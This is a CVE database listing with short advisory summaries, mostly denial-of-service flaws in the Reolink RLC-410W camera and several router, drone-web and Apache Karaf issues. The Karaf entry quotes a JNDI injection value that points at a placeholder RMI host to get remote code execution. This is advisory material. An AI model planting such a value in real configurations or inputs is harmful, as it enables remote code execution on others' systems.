Total
13197 CVE
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2021-44415 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.7 High |
| A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. ModifyUser param is not object. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44416 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.7 High |
| A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. Disconnect param is not object. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44417 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.7 High |
| A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. GetAlarm param is not object. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44418 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.7 High |
| A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. GetMdState param is not object. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44419 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.7 High |
| A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. GetMdAlarm param is not object. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-21968 | 1 Sealevel | 2 Seaconnect 370w, Seaconnect 370w Firmware | 2025-04-15 | 8.3 High |
| A file write vulnerability exists in the OTA update task functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted MQTT payload can lead to arbitrary file overwrite. An attacker can perform a man-in-the-middle attack to trigger this vulnerability. | ||||
| CVE-2021-44354 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.5 High |
| Multiple denial of service vulnerabilities exist in the cgiserver.cgi JSON command parser functionality of Reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44355 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.5 High |
| Multiple denial of service vulnerabilities exist in the cgiserver.cgi JSON command parser functionality of Reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44356 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.5 High |
| Multiple denial of service vulnerabilities exist in the cgiserver.cgi JSON command parser functionality of Reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44357 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.5 High |
| Multiple denial of service vulnerabilities exist in the cgiserver.cgi JSON command parser functionality of Reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44366 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.5 High |
| Multiple denial of service vulnerabilities exist in the cgiserver.cgi JSON command parser functionality of Reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44375 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.5 High |
| Multiple denial of service vulnerabilities exist in the cgiserver.cgi JSON command parser functionality of Reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2021-44394 | 1 Reolink | 2 Rlc-410w, Rlc-410w Firmware | 2025-04-15 | 7.5 High |
| Multiple denial of service vulnerabilities exist in the cgiserver.cgi JSON command parser functionality of Reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. An attacker can send an HTTP request to trigger this vulnerability. | ||||
| CVE-2022-28711 | 1 Ardupilot | 1 Apweb | 2025-04-15 | 9.8 Critical |
| A memory corruption vulnerability exists in the cgi.c unescape functionality of ArduPilot APWeb master branch 50b6b7ac - master branch 46177cb9. A specially-crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. | ||||
| CVE-2022-26780 | 1 Inhandnetworks | 2 Ir302, Ir302 Firmware | 2025-04-15 | 8.8 High |
| Multiple improper input validation vulnerabilities exists in the libnvram.so nvram_import functionality of InHand Networks InRouter302 V3.5.4. A specially-crafted file can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.An improper input validation vulnerability exists in the `httpd`'s `user_define_init` function. Controlling the `user_define_timeout` nvram variable can lead to remote code execution. | ||||
| CVE-2022-26781 | 1 Inhandnetworks | 2 Ir302, Ir302 Firmware | 2025-04-15 | 8.8 High |
| Multiple improper input validation vulnerabilities exists in the libnvram.so nvram_import functionality of InHand Networks InRouter302 V3.5.4. A specially-crafted file can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.An improper input validation vulnerability exists in the `httpd`'s `user_define_print` function. Controlling the `user_define_timeout` nvram variable can lead to remote code execution. | ||||
| CVE-2022-26782 | 1 Inhandnetworks | 2 Ir302, Ir302 Firmware | 2025-04-15 | 8.8 High |
| Multiple improper input validation vulnerabilities exists in the libnvram.so nvram_import functionality of InHand Networks InRouter302 V3.5.4. A specially-crafted file can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.An improper input validation vulnerability exists in the `httpd`'s `user_define_set_item` function. Controlling the `user_define_timeout` nvram variable can lead to remote code execution. | ||||
| CVE-2022-28127 | 1 Robustel | 2 R1510, R1510 Firmware | 2025-04-15 | 9.1 Critical |
| A data removal vulnerability exists in the web_server /action/remove/ API functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary file deletion. An attacker can send a sequence of requests to trigger this vulnerability. | ||||
| CVE-2022-40145 | 1 Apache | 1 Karaf | 2025-04-15 | 9.8 Critical |
| This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 | ||||
| CVE-2024-7773 | 1 Ollama | 1 Ollama | 2025-04-15 | N/A |
| ** REJECT ** DO NOT USE THIS CVE ID NUMBER. The Rejected CVE Record is a duplicate of CVE-2024-45436. Notes: All CVE users should reference CVE-2024-45436 instead of this CVE Record. All references and descriptions in this candidate have been removed to prevent accidental usage. | ||||